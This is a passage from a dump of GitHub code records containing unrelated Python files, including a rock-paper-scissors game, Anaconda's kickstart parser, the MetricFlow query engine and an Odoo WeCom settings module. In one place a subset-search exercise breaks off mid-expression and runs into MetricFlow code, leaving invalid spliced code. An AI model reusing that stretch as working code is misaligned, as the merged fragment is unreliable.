filename.startswith(\"Kickstarter\"):\n destination = f\"{directory}{filename[12: 22]}.json\"\n # Renaming the file\n os.rename(source, destination)\n print(f\"Renamed: {source} ---> {destination}\")\n","repo_name":"Daily-Lama-Capstone/Daily-Lama-Capstone","sub_path":"capstone_json_functions.py","file_name":"capstone_json_functions.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"24282367178","text":"import random\r\nrock = \"\"\"\r\n _______\r\n---' ____)\r\n (_____)\r\n (_____)\r\n (____)\r\n---.__(___)\r\n\"\"\"\r\nscissor = \"\"\"\r\n _______\r\n---' ____)____\r\n ______)\r\n __________)\r\n (____)\r\n---.__(___)\r\n\"\"\"\r\npaper = \"\"\"\r\n _______\r\n---' ____)____\r\n ______)\r\n _______)\r\n _______)\r\n---.__________)\r\n\"\"\"\r\ngame = [rock, scissor, paper]\r\ngame2= ['rock', 'scissor', 'paper']\r\ncomputer_hand = random.choice(game2)\r\nprint(\"Welcome to Biswadeep Datta's brand new game Rock Paper Scissor.Rules: Type rock or scissor or paper\")\r\nuser_hand = input(\"Enter your turn among rock paper scissor \")\r\nprint(\"You chose:\")\r\nif(user_hand=='rock'):\r\n print(rock)\r\nif(user_hand=='paper'):\r\n print(paper)\r\n\r\nif(user_hand=='scissor'):\r\n print(scissor)\r\n\r\nprint(\"Computer chose: \")\r\n\r\nif computer_hand=='rock':\r\n\r\n print(rock)\r\n if computer_hand==user_hand:\r\n print(\"Draw\")\r\n \r\n \r\n if user_hand=='paper':\r\n print(\"You win\")\r\n if user_hand=='scissor':\r\n print(\"You lose\")\r\n\r\n\r\n\r\nif computer_hand=='paper':\r\n print(paper)\r\n \r\n \r\n \r\n if computer_hand==user_hand:\r\n print(\"Draw\")\r\n if user_hand=='scissor':\r\n print(\"You win\")\r\n if user_hand=='rock':\r\n print(\"You lose\")\r\n\r\n\r\n\r\nif computer_hand=='scissor':\r\n print(scissor)\r\n if computer_hand==user_hand:\r\n print(\"Draw\")\r\n if user_hand=='rock':\r\n print(\"You win\")\r\n if user_hand=='paper':\r\n print(\"You lose\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"biswadeepdatta77/Rock-Paper-Scissor-Game","sub_path":"Rock_Paper_Scissor.py","file_name":"Rock_Paper_Scissor.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74984389860","text":"__all__ = [\"SplitKickstartParser\", \"VALID_SECTIONS_ANACONDA\"]\n\nfrom pykickstart.parser import KickstartParser\nfrom pykickstart.sections import Section\n\nfrom pyanaconda.modules.boss.kickstart_manager.element import KickstartElement,\\\n TrackedKickstartElements\n\nVALID_SECTIONS_ANACONDA = [\n \"%pre\", \"%pre-install\", \"%post\", \"%onerror\", \"%traceback\", \"%packages\", \"%addon\"\n]\n\n\nclass StoreSection(Section):\n \"\"\"Section for storing section content and header line references.\n\n Similarly as NullSection defines a section that parser will recognize (ie\n will not raise an error). The section will pass itself to an object for storing\n sections if supplied.\n \"\"\"\n\n allLines = True\n\n def __init__(self, *args, **kwargs):\n \"\"\"Create a new StoreSection instance.\n\n You must pass a sectionOpen parameter (including a leading '%') for the\n section to make it valid but just ignored. If you want to store the\n content, supply a store argument.\n\n Required kwargs:\n sectionOpen - section name, including '%' starting character\n\n Optional kwargs:\n store - an instance of an object for storing the section\n (SplitKickstartParser) which must provide\n add_section(StoreSection) method\n\n attributes:\n header_lineno - section header line in kickstart file\n args - section header parsed by KickstartParser (shlex)\n lines - list of section body lines\n \"\"\"\n super().__init__(*args, **kwargs)\n self.sectionOpen = kwargs.get(\"sectionOpen\")\n self._store = kwargs.get(\"store\", None)\n self.header_lineno = 0\n self.args = []\n self.lines = []\n\n def handleHeader(self, lineno, args):\n self.header_lineno = lineno\n self.args = args\n\n def handleLine(self, line):\n self.lines.append(line)\n\n def finalize(self):\n if self._store is not None:\n self._store.add_section(self)\n self.header_lineno = 0\n self.args = []\n self.lines = []\n\n\nclass SplitKickstartParser(KickstartParser):\n \"\"\"Kickstart parser for storing kickstart elements.\n\n Stores kickstart elements (commands, sections, addons) with their line\n number and file name references to kickstart file.\n Does not do any actual command or section parsing (ie command syntax\n checking).\n\n :raises KickstartParseError: on invalid section\n :raises KickstartError: on missing %include unless instantiated with\n missing_include_is_fatal=False\n \"\"\"\n\n # file name to be used in case of parsing string if not supplied\n unknown_filename = \"
\"\n\n def __init__(self, handler, valid_sections=None, missing_include_is_fatal=True):\n \"\"\"Initialize the parser.\n\n :param valid_sections: list of valid section names (including '%')\n :type valid_sections: list(str)\n :param missing_include_is_fatal: raise KickstartError if included file\n is not found\n :type missing_include_is_fatal: bool\n \"\"\"\n\n self._valid_sections = valid_sections or []\n # calls setupSections\n super().__init__(handler, missingIncludeIsFatal=missing_include_is_fatal)\n self._current_ks_filename = self.unknown_filename\n self._result = TrackedKickstartElements()\n\n @property\n def valid_sections(self):\n \"\"\"List of valid kickstart sections\"\"\"\n return list(self._valid_sections)\n\n @valid_sections.setter\n def valid_sections(self, value):\n self._valid_sections = value\n\n def split(self, filename):\n \"\"\"Split the kickstart file into elements.\n\n :param filename: name of kickstart file\n :type filename: str\n\n :return: object containing kickstart elements with references to\n kickstart files\n :rtype: KickstartElements\n \"\"\"\n with open(filename, \"r\") as f:\n kickstart = f.read()\n return self.split_from_string(kickstart, filename=filename)\n\n def split_from_string(self, kickstart, filename=None):\n \"\"\"Split the kickstart given as string into elements.\n\n :param kickstart: kickstart to be split\n :type kickstart: str\n :param filename: filename to be used as file reference in the result\n :type filename: str\n\n :return: object containing kickstart elements with references to\n kickstart\n :rtype: KickstartElements\n \"\"\"\n self._reset()\n self._current_ks_filename = filename or self.unknown_filename\n self.readKickstartFromString(kickstart)\n return self._result\n\n def add_section(self, section):\n \"\"\"Adds a StoreSection to the result.\"\"\"\n element = KickstartElement(section.args, section.lines,\n section.header_lineno, self._current_ks_filename)\n self._result.append(element)\n\n def _reset(self):\n self._result = TrackedKickstartElements()\n self.setupSections()\n\n def _handleInclude(self, f):\n \"\"\"Overrides parent to keep track of include file names.\"\"\"\n parent_file = self._current_ks_filename\n self._current_ks_filename = f\n super()._handleInclude(f)\n self._current_ks_filename = parent_file\n\n def handleCommand(self, lineno, args):\n \"\"\"Overrides parent method to store the command.\"\"\"\n element = KickstartElement(args, [self._line], lineno, self._current_ks_filename)\n self._result.append(element)\n\n def setupSections(self):\n \"\"\"Overrides parent method to store sections.\"\"\"\n self._sections = {}\n for section in self._valid_sections:\n self.registerSection(StoreSection(self.handler,\n sectionOpen=section,\n store=self))\n","repo_name":"rhinstaller/anaconda","sub_path":"pyanaconda/modules/boss/kickstart_manager/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":494,"dataset":"github-code","pt":"35"} +{"seq_id":"42422145425","text":"import sys\nsys.stdin = open('input2.txt')\n\ndef subset(n, su):\n global visit, count\n if n == len(score):\n if not visit & (1< MetricFlowQueryRequest:\n return MetricFlowQueryRequest(\n request_id=MetricFlowRequestId(mf_rid=f\"{random_id()}\"),\n metric_names=metric_names,\n group_by_names=group_by_names,\n limit=limit,\n time_constraint_start=time_constraint_start,\n time_constraint_end=time_constraint_end,\n where_constraint=where_constraint,\n order_by_names=order_by_names,\n output_table=output_table,\n sql_optimization_level=sql_optimization_level,\n query_type=query_type,\n )\n\n\n@dataclass(frozen=True)\nclass MetricFlowQueryResult: # noqa: D\n \"\"\"The result of a query and context on how it was generated.\"\"\"\n\n query_spec: MetricFlowQuerySpec\n dataflow_plan: DataflowPlan[SemanticModelDataSet]\n sql: str\n result_df: Optional[pd.DataFrame] = None\n result_table: Optional[SqlTable] = None\n\n\n@dataclass(frozen=True)\nclass MetricFlowExplainResult:\n \"\"\"Returns plans for resolving a query.\"\"\"\n\n query_spec: MetricFlowQuerySpec\n dataflow_plan: DataflowPlan[SemanticModelDataSet]\n execution_plan: ExecutionPlan\n output_table: Optional[SqlTable] = None\n\n @property\n def rendered_sql(self) -> SqlQuery:\n \"\"\"Return the SQL query that would be run for the given query.\"\"\"\n if len(self.execution_plan.tasks) != 1:\n raise NotImplementedError(\n f\"Multiple tasks in the execution plan not yet supported. Got tasks: {self.execution_plan.tasks}\"\n )\n\n sql_query = self.execution_plan.tasks[0].sql_query\n if not sql_query:\n raise NotImplementedError(\n f\"Execution plan tasks without a SQL query not yet supported. Got tasks: {self.execution_plan.tasks}\"\n )\n\n return sql_query\n\n @property\n def rendered_sql_without_descriptions(self) -> SqlQuery:\n \"\"\"Return the SQL query without the inline descriptions.\"\"\"\n sql_query = self.rendered_sql\n return SqlQuery(\n sql_query=\"\\n\".join(\n filter(\n lambda line: not line.strip().startswith(\"--\"),\n sql_query.sql_query.split(\"\\n\"),\n )\n ),\n bind_parameters=sql_query.bind_parameters,\n )\n\n\nclass AbstractMetricFlowEngine(ABC):\n \"\"\"Query interface for clients.\"\"\"\n\n @abstractmethod\n def query(\n self,\n mf_request: MetricFlowQueryRequest,\n ) -> MetricFlowQueryResult:\n \"\"\"Query for metrics.\"\"\"\n pass\n\n @abstractmethod\n def explain(\n self,\n mf_request: MetricFlowQueryRequest,\n ) -> MetricFlowExplainResult:\n \"\"\"Similar to query - returns the query that would have been executed.\"\"\"\n pass\n\n @abstractmethod\n def simple_dimensions_for_metrics(self, metric_names: List[str]) -> List[Dimension]:\n \"\"\"Retrieves a list of all common dimensions for metric_names.\n\n \"simple\" dimensions are the ones that people expect from a UI perspective. For example, if \"ds\" is a time\n dimension at a day granularity, this would not list \"ds__week\".\n\n Args:\n metric_names: Names of metrics to get common dimensions from.\n\n Returns:\n A list of Dimension objects containing metadata.\n \"\"\"\n pass\n\n @abstractmethod\n def entities_for_metrics(self, metric_names: List[str]) -> List[Entity]:\n \"\"\"Retrieves a list of all entities for metric_names.\n\n Args:\n metric_names: Names of metrics to get common entities from.\n\n Returns:\n A list of Entity objects containing metadata.\n \"\"\"\n pass\n\n @abstractmethod\n def list_metrics(self) -> List[Metric]:\n \"\"\"Retrieves a list of metric names.\n\n Returns:\n A list of Metric objects containing metadata.\n \"\"\"\n pass\n\n @abstractmethod\n def get_dimension_values(\n self,\n metric_name: str,\n get_group_by_values: str,\n time_constraint_start: Optional[datetime.datetime] = None,\n time_constraint_end: Optional[datetime.datetime] = None,\n ) -> List[str]:\n \"\"\"Retrieves a list of dimension values given a [metric_name, get_group_by_values].\n\n Args:\n metric_name: Name of metric that contains the group_by.\n get_group_by_values: Name of group_by to get values from.\n time_constraint_start: Get data for the start of this time range.\n time_constraint_end: Get data for the end of this time range.\n\n Returns:\n A list of dimension values as string.\n \"\"\"\n pass\n\n @abstractmethod\n def explain_get_dimension_values( # noqa: D\n self,\n metric_name: str,\n get_group_by_values: str,\n time_constraint_start: Optional[datetime.datetime] = None,\n time_constraint_end: Optional[datetime.datetime] = None,\n ) -> MetricFlowExplainResult:\n \"\"\"Returns the SQL query for get_dimension_values.\n\n Args:\n metric_name: Name of metric that contains the group_by.\n get_group_by_values: Name of group_by to get values from.\n time_constraint_start: Get data for the start of this time range.\n time_constraint_end: Get data for the end of this time range.\n\n Returns:\n An object with the rendered SQL and generated plans.\n \"\"\"\n pass\n\n\nclass MetricFlowEngine(AbstractMetricFlowEngine):\n \"\"\"Main entry point for queries.\"\"\"\n\n @staticmethod\n def from_config(handler: YamlFileHandler) -> MetricFlowEngine:\n \"\"\"Initialize MetricFlowEngine via yaml config file.\"\"\"\n sql_client = make_sql_client_from_config(handler)\n\n # Ideally we should put this getting of of CONFIG_DBT_REPO in a helper\n semantic_manifest_lookup = SemanticManifestLookup(build_semantic_manifest_from_config(handler))\n system_schema = not_empty(handler.get_value(CONFIG_DWH_SCHEMA), CONFIG_DWH_SCHEMA, handler.url)\n return MetricFlowEngine(\n semantic_manifest_lookup=semantic_manifest_lookup,\n sql_client=sql_client,\n system_schema=system_schema,\n )\n\n def __init__(\n self,\n semantic_manifest_lookup: SemanticManifestLookup,\n sql_client: SqlClient,\n system_schema: str,\n time_source: TimeSource = ServerTimeSource(),\n column_association_resolver: Optional[ColumnAssociationResolver] = None,\n time_spine_source: Optional[TimeSpineSource] = None,\n ) -> None:\n \"\"\"Initializer for MetricFlowEngine.\n\n For direct calls to construct MetricFlowEngine, do not pass the following parameters,\n - time_source\n - column_association_resolver\n - time_spine_source\n These parameters are mainly there to be overridden during tests.\n \"\"\"\n self._semantic_manifest_lookup = semantic_manifest_lookup\n self._sql_client = sql_client\n self._column_association_resolver = column_association_resolver or (\n DunderColumnAssociationResolver(semantic_manifest_lookup)\n )\n self._time_source = time_source\n self._time_spine_source = time_spine_source or TimeSpineSource(schema_name=system_schema)\n\n self._schema = system_schema\n\n self._source_data_sets: List[SemanticModelDataSet] = []\n converter = SemanticModelToDataSetConverter(column_association_resolver=self._column_association_resolver)\n for semantic_model in self._semantic_manifest_lookup.semantic_manifest.semantic_models:\n data_set = converter.create_sql_source_data_set(semantic_model)\n self._source_data_sets.append(data_set)\n logger.info(f\"Created source dataset from semantic model '{semantic_model.name}'\")\n\n source_node_builder = SourceNodeBuilder(self._semantic_manifest_lookup)\n source_nodes = source_node_builder.create_from_data_sets(self._source_data_sets)\n\n node_output_resolver = DataflowPlanNodeOutputDataSetResolver[SemanticModelDataSet](\n column_association_resolver=DunderColumnAssociationResolver(semantic_manifest_lookup),\n semantic_manifest_lookup=semantic_manifest_lookup,\n time_spine_source=self._time_spine_source,\n )\n\n self._dataflow_plan_builder = DataflowPlanBuilder[SemanticModelDataSet](\n source_nodes=source_nodes,\n semantic_manifest_lookup=self._semantic_manifest_lookup,\n time_spine_source=self._time_spine_source,\n )\n self._to_sql_query_plan_converter = DataflowToSqlQueryPlanConverter[SemanticModelDataSet](\n column_association_resolver=self._column_association_resolver,\n semantic_manifest_lookup=self._semantic_manifest_lookup,\n time_spine_source=self._time_spine_source,\n )\n self._to_execution_plan_converter = DataflowToExecutionPlanConverter[SemanticModelDataSet](\n sql_plan_converter=self._to_sql_query_plan_converter,\n sql_plan_renderer=self._sql_client.sql_engine_attributes.sql_query_plan_renderer,\n sql_client=sql_client,\n )\n self._executor = SequentialPlanExecutor()\n\n self._query_parser = MetricFlowQueryParser(\n column_association_resolver=self._column_association_resolver,\n model=self._semantic_manifest_lookup,\n source_nodes=source_nodes,\n node_output_resolver=node_output_resolver,\n )\n\n def _generate_sql_table(self, table_name: str) -> SqlTable:\n return SqlTable.from_string(f\"{self._schema}.{table_name}\")\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def query(self, mf_request: MetricFlowQueryRequest) -> MetricFlowQueryResult: # noqa: D\n logger.info(f\"Starting query request:\\n\" f\"{indent_log_line(pformat_big_objects(mf_request))}\")\n explain_result = self._create_execution_plan(mf_request)\n execution_plan = explain_result.execution_plan\n\n if len(execution_plan.tasks) != 1:\n raise NotImplementedError(\"Multiple tasks not yet supported.\")\n\n task = execution_plan.tasks[0]\n\n logger.info(f\"Sequentially running tasks in:\\n\" f\"{execution_plan_to_text(execution_plan)}\")\n execution_results = self._executor.execute_plan(execution_plan)\n logger.info(\"Finished running tasks in execution plan\")\n\n if execution_results.contains_task_errors:\n raise ExecutionException(f\"Got errors while executing tasks:\\n{execution_results.get_result(task.task_id)}\")\n\n task_execution_result = execution_results.get_result(task.task_id)\n\n assert task_execution_result.sql, \"Task execution should have returned SQL that was run\"\n\n logger.info(f\"Finished query request: {mf_request.request_id}\")\n return MetricFlowQueryResult(\n query_spec=explain_result.query_spec,\n dataflow_plan=explain_result.dataflow_plan,\n sql=task_execution_result.sql,\n result_df=task_execution_result.df,\n result_table=explain_result.output_table,\n )\n\n def _create_execution_plan(self, mf_query_request: MetricFlowQueryRequest) -> MetricFlowExplainResult:\n query_spec = self._query_parser.parse_and_validate_query(\n metric_names=mf_query_request.metric_names,\n group_by_names=mf_query_request.group_by_names,\n limit=mf_query_request.limit,\n time_constraint_start=mf_query_request.time_constraint_start,\n time_constraint_end=mf_query_request.time_constraint_end,\n where_constraint_str=mf_query_request.where_constraint,\n order=mf_query_request.order_by_names,\n )\n logger.info(f\"Query spec is:\\n{pformat_big_objects(query_spec)}\")\n\n if self._semantic_manifest_lookup.metric_lookup.contains_cumulative_or_time_offset_metric(\n tuple(m.as_reference for m in query_spec.metric_specs)\n ):\n if self._time_spine_source.time_column_granularity != TimeGranularity.DAY:\n raise RuntimeError(\n f\"A time spine source with a granularity {self._time_spine_source.time_column_granularity} is not \"\n f\"yet supported.\"\n )\n logger.warning(\n f\"Query spec requires a time spine dataset conforming to the following spec: {self._time_spine_source}. \"\n )\n time_constraint_updated = False\n if not mf_query_request.time_constraint_start:\n time_constraint_start = self._time_source.get_time() - datetime.timedelta(days=365)\n logger.warning(\n \"A start time has not be supplied while querying for cumulative metrics. To avoid an excessive \"\n f\"number of rows, the start time will be changed to {time_constraint_start.isoformat()}\"\n )\n time_constraint_updated = True\n if not mf_query_request.time_constraint_end:\n time_constraint_end = self._time_source.get_time()\n logger.warning(\n \"A end time has not be supplied while querying for cumulative metrics. To avoid an excessive \"\n f\"number of rows, the end time will be changed to {time_constraint_end.isoformat()}\"\n )\n time_constraint_updated = True\n if time_constraint_updated:\n query_spec = self._query_parser.parse_and_validate_query(\n metric_names=mf_query_request.metric_names,\n group_by_names=mf_query_request.group_by_names,\n limit=mf_query_request.limit,\n time_constraint_start=mf_query_request.time_constraint_start,\n time_constraint_end=mf_query_request.time_constraint_end,\n where_constraint_str=mf_query_request.where_constraint,\n order=mf_query_request.order_by_names,\n )\n logger.warning(f\"Query spec updated to:\\n{pformat_big_objects(query_spec)}\")\n\n output_table: Optional[SqlTable] = None\n if mf_query_request.output_table is not None:\n output_table = SqlTable.from_string(mf_query_request.output_table)\n\n output_selection_specs: Optional[InstanceSpecSet] = None\n if mf_query_request.query_type == MetricFlowQueryType.DIMENSION_VALUES:\n # Filter result by dimension columns if it's a dimension values query\n if len(query_spec.entity_specs) > 0:\n raise InvalidQueryException(\"Querying dimension values for entities is not allowed.\")\n output_selection_specs = InstanceSpecSet(\n dimension_specs=query_spec.dimension_specs,\n time_dimension_specs=query_spec.time_dimension_specs,\n )\n\n dataflow_plan = self._dataflow_plan_builder.build_plan(\n query_spec=query_spec,\n output_sql_table=output_table,\n output_selection_specs=output_selection_specs,\n optimizers=(SourceScanOptimizer[SemanticModelDataSet](),),\n )\n\n if len(dataflow_plan.sink_output_nodes) > 1:\n raise NotImplementedError(\n f\"Multiple output nodes in the dataflow plan not yet supported. \"\n f\"Got tasks: {dataflow_plan.sink_output_nodes}\"\n )\n\n execution_plan = self._to_execution_plan_converter.convert_to_execution_plan(dataflow_plan)\n\n return MetricFlowExplainResult(\n query_spec=query_spec,\n dataflow_plan=dataflow_plan,\n execution_plan=execution_plan,\n output_table=output_table,\n )\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def explain(self, mf_request: MetricFlowQueryRequest) -> MetricFlowExplainResult: # noqa: D\n return self._create_execution_plan(mf_request)\n\n def simple_dimensions_for_metrics(self, metric_names: List[str]) -> List[Dimension]: # noqa: D\n path_key_to_linkable_dimensions = (\n self._semantic_manifest_lookup.metric_lookup.linkable_set_for_metrics(\n metric_references=[MetricReference(element_name=mname) for mname in metric_names],\n without_any_property=frozenset(\n {\n LinkableElementProperties.ENTITY,\n LinkableElementProperties.DERIVED_TIME_GRANULARITY,\n LinkableElementProperties.LOCAL_LINKED,\n }\n ),\n )\n ).path_key_to_linkable_dimensions\n\n dimensions: List[Dimension] = []\n for (\n path_key,\n linkable_dimensions_tuple,\n ) in path_key_to_linkable_dimensions.items():\n for linkable_dimension in linkable_dimensions_tuple:\n semantic_model = self._semantic_manifest_lookup.semantic_model_lookup.get_by_reference(\n linkable_dimension.semantic_model_origin\n )\n assert semantic_model\n dimensions.append(\n Dimension.from_pydantic(\n pydantic_dimension=semantic_model.get_dimension(\n DimensionReference(element_name=linkable_dimension.element_name)\n ),\n path_key=path_key,\n )\n )\n return dimensions\n\n def entities_for_metrics(self, metric_names: List[str]) -> List[Entity]: # noqa: D\n path_key_to_linkable_entities = (\n self._semantic_manifest_lookup.metric_lookup.linkable_set_for_metrics(\n metric_references=[MetricReference(element_name=mname) for mname in metric_names],\n with_any_property=frozenset(\n {\n LinkableElementProperties.ENTITY,\n }\n ),\n )\n ).path_key_to_linkable_entities\n\n entities: List[Entity] = []\n for (\n path_key,\n linkable_entity_tuple,\n ) in path_key_to_linkable_entities.items():\n for linkable_entity in linkable_entity_tuple:\n semantic_model = self._semantic_manifest_lookup.semantic_model_lookup.get_by_reference(\n linkable_entity.semantic_model_origin\n )\n assert semantic_model\n entities.append(\n Entity.from_pydantic(\n pydantic_entity=semantic_model.get_entity(\n EntityReference(element_name=linkable_entity.element_name)\n )\n )\n )\n return entities\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def list_metrics(self) -> List[Metric]: # noqa: D\n metric_references = self._semantic_manifest_lookup.metric_lookup.metric_references\n metrics = self._semantic_manifest_lookup.metric_lookup.get_metrics(metric_references)\n return [\n Metric.from_pydantic(\n pydantic_metric=metric,\n dimensions=self.simple_dimensions_for_metrics([metric.name]),\n )\n for metric in metrics\n ]\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def get_dimension_values( # noqa: D\n self,\n metric_name: str,\n get_group_by_values: str,\n time_constraint_start: Optional[datetime.datetime] = None,\n time_constraint_end: Optional[datetime.datetime] = None,\n ) -> List[str]:\n # Run query\n query_result = self.query(\n MetricFlowQueryRequest.create_with_random_request_id(\n metric_names=[metric_name],\n group_by_names=[get_group_by_values],\n time_constraint_start=time_constraint_start,\n time_constraint_end=time_constraint_end,\n query_type=MetricFlowQueryType.DIMENSION_VALUES,\n )\n )\n result_dataframe = query_result.result_df\n if result_dataframe is None:\n return []\n return [str(val) for val in result_dataframe[get_group_by_values]]\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def explain_get_dimension_values( # noqa: D\n self,\n metric_name: str,\n get_group_by_values: str,\n time_constraint_start: Optional[datetime.datetime] = None,\n time_constraint_end: Optional[datetime.datetime] = None,\n ) -> MetricFlowExplainResult:\n return self._create_execution_plan(\n MetricFlowQueryRequest.create_with_random_request_id(\n metric_names=[metric_name],\n group_by_names=[get_group_by_values],\n time_constraint_start=time_constraint_start,\n time_constraint_end=time_constraint_end,\n query_type=MetricFlowQueryType.DIMENSION_VALUES,\n )\n )\n","repo_name":"sandeepks/metricflow","sub_path":"metricflow/engine/metricflow_engine.py","file_name":"metricflow_engine.py","file_ext":"py","file_size_in_byte":26665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"37363057048","text":"import pygame, os\r\n\r\n\r\ndef load_textures(*args):\r\n for path in args:\r\n for f, sf, files in os.walk(path):\r\n for file in files:\r\n name = file.split('.')[0]\r\n file_path = f + '\\\\' + file\r\n img = pygame.image.load(file_path)\r\n textures[name] = img\r\n\r\n\r\ntextures = {}\r\nload_textures('textures')\r\nprint(textures)","repo_name":"meabefir/pygame-oop","sub_path":"TextureLoader.py","file_name":"TextureLoader.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35858542736","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError, ValidationError\nimport time\n\nfrom odoo.addons.wecom_api.api.wecom_abstract_api import ApiException\n\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = \"res.config.settings\"\n\n company_id = fields.Many2one(\n \"res.company\",\n string=\"Company\",\n required=True,\n default=lambda self: self.env.company,\n )\n\n wecom_api_domain_ip = fields.Char(\n \"Wecom API Domain IP\", config_parameter=\"wecom.api_domain_ip\",\n )\n\n # 加入企微微信二维码\n contacts_join_qrcode_enabled = fields.Boolean(\n related=\"company_id.wecom_contacts_join_qrcode_enabled\", readonly=False\n )\n contacts_join_qrcode = fields.Char(\n related=\"company_id.wecom_contacts_join_qrcode\", readonly=False\n )\n contacts_join_qrcode_size_type = fields.Selection(\n related=\"company_id.wecom_contacts_join_qrcode_size_type\", readonly=False\n )\n contacts_join_qrcode_last_time = fields.Datetime(\n related=\"company_id.wecom_contacts_join_qrcode_last_time\", readonly=False\n )\n\n # 通讯录\n contacts_app_id = fields.Many2one(\n related=\"company_id.contacts_app_id\", readonly=False\n )\n\n contacts_secret = fields.Char(related=\"contacts_app_id.secret\", readonly=False)\n\n # contacts_access_token = fields.Char(related=\"contacts_app_id.access_token\")\n\n contacts_app_config_ids = fields.One2many(\n related=\"contacts_app_id.app_config_ids\", readonly=False,\n )\n\n contacts_app_callback_service_ids = fields.One2many(\n related=\"contacts_app_id.app_callback_service_ids\", readonly=False\n )\n\n module_wecom_contacts_sync = fields.Boolean(\"WeCom Contacts Synchronized\")\n\n module_wecom_material = fields.Boolean(\"WeCom Material\")\n module_wecom_auth_oauth = fields.Boolean(\"WeCom Authentication\")\n module_wecom_message = fields.Boolean(\"WeCom Message\")\n module_portal = fields.Boolean(\"Customer Portal\")\n module_wecom_portal = fields.Boolean(\"Wecom Portal\")\n module_wecom_msgaudit = fields.Boolean(\"Wecom Session Content Archive\")\n module_wecom_attendance = fields.Boolean(\"WeCom Attendances\")\n module_wecom_approval = fields.Boolean(\"WeCom Approvals\")\n\n def cron_get_join_qrcode(self):\n \"\"\"\n 自动任务获取加入企业二维码\n \"\"\"\n companies = self.env[\"res.company\"].search(\n [\n (\"is_wecom_organization\", \"=\", True),\n (\"wecom_contacts_join_qrcode_enabled\", \"=\", True),\n ]\n )\n for company in companies:\n _logger.info(\n _(\"Automatic task:Start to get join enterprise QR code of company [%s]\")\n % (company.name)\n )\n if not company.contacts_app_id:\n _logger.info(\n _(\"Automatic task:Please bind the contact app of company [%s]!\")\n % (company.name)\n )\n elif not company.wecom_contacts_join_qrcode_enabled:\n _logger.info(\n _(\n \"Automatic task:Please enable the company [%s] to join the enterprise wechat QR code function!\"\n )\n % (company.name)\n )\n else:\n try:\n wecomapi = self.env[\"wecom.service_api\"].InitServiceApi(\n company.corpid, company.contacts_app_id.secret\n )\n\n last_time = company.wecom_contacts_join_qrcode_last_time\n size_type = company.wecom_contacts_join_qrcode_size_type\n # 超期\n overdue = False\n if last_time:\n overdue = self.env[\n \"wecomapi.tools.datetime\"\n ].cheeck_days_overdue(last_time, 7)\n if not last_time or overdue:\n response = wecomapi.httpCall(\n self.env[\"wecom.service_api_list\"].get_server_api_call(\n \"GET_JOIN_QRCODE\"\n ),\n {\"size_type\": size_type},\n )\n if response[\"errcode\"] == 0:\n company.write(\n {\n \"wecom_contacts_join_qrcode\": response[\n \"join_qrcode\"\n ],\n \"wecom_contacts_join_qrcode_last_time\": datetime.datetime.now(),\n }\n )\n except ApiException as ex:\n error = self.env[\"wecom.service_api_error\"].get_error_by_code(\n ex.errCode\n )\n _logger.warning(\n _(\n \"Automatic task:Error in obtaining the QR code of joining company [%s],error code: %s, error name: %s, error message: %s\"\n )\n % (company.name, str(ex.errCode), error[\"name\"], ex.errMsg)\n )\n _logger.info(\n _(\n \"Automatic task:End obtaining joining enterprise QR code of company [%s]\"\n )\n % (company.name)\n )\n\n def get_join_qrcode(self):\n \"\"\"\n 获取加入企业二维码\n \"\"\"\n # self.contacts_app_id.get_join_qrcode()\n ir_config = self.env[\"ir.config_parameter\"].sudo()\n debug = ir_config.get_param(\"wecom.debug_enabled\")\n\n if not self.contacts_app_id:\n raise ValidationError(_(\"Please bind contact app!\"))\n\n if not self.contacts_join_qrcode_enabled:\n raise ValidationError(\n _(\"Please enable the function of join enterprise QR code!\")\n )\n\n if debug:\n _logger.info(\n _(\"Start getting join enterprise QR code of company [%s]\")\n % (self.company_id.name)\n )\n try:\n wecomapi = self.env[\"wecom.service_api\"].InitServiceApi(\n self.company_id.corpid, self.contacts_app_id.secret\n )\n\n last_time = self.contacts_join_qrcode_last_time\n size_type = self.contacts_join_qrcode_size_type\n # 超期\n overdue = False\n if last_time:\n overdue = self.env[\"wecomapi.tools.datetime\"].cheeck_days_overdue(\n last_time, 7\n )\n if not last_time or overdue:\n response = wecomapi.httpCall(\n self.env[\"wecom.service_api_list\"].get_server_api_call(\n \"GET_JOIN_QRCODE\"\n ),\n {\"size_type\": size_type},\n )\n if response[\"errcode\"] == 0:\n self.company_id.write(\n {\n \"wecom_contacts_join_qrcode\": response[\"join_qrcode\"],\n \"wecom_contacts_join_qrcode_last_time\": datetime.datetime.now(),\n }\n )\n # self.contacts_join_qrcode=response[\"join_qrcode\"]\n # self.contacts_join_qrcode_last_time = datetime.datetime.now()\n\n except ApiException as ex:\n return self.env[\"wecomapi.tools.action\"].ApiExceptionDialog(\n ex, raise_exception=True\n )\n\n finally:\n if debug:\n _logger.info(\n _(\"End getting join enterprise QR code of company [%s]\")\n % (self.company_id.name)\n )\n\n # TODO: 使用任务 获取IP\n\n def get_wecom_api_domain_ip(self):\n \"\"\"\n 获取企业微信API域名IP段\n \"\"\"\n ir_config = self.env[\"ir.config_parameter\"].sudo()\n debug = ir_config.get_param(\"wecom.debug_enabled\")\n\n if not self.contacts_app_id:\n raise ValidationError(_(\"Please bind contact app!\"))\n\n if debug:\n _logger.info(_(\"Start to get enterprise wechat API domain name IP segment\"))\n try:\n wecomapi = self.env[\"wecom.service_api\"].InitServiceApi(\n self.company_id.corpid, self.contacts_app_id.secret\n )\n\n response = wecomapi.httpCall(\n 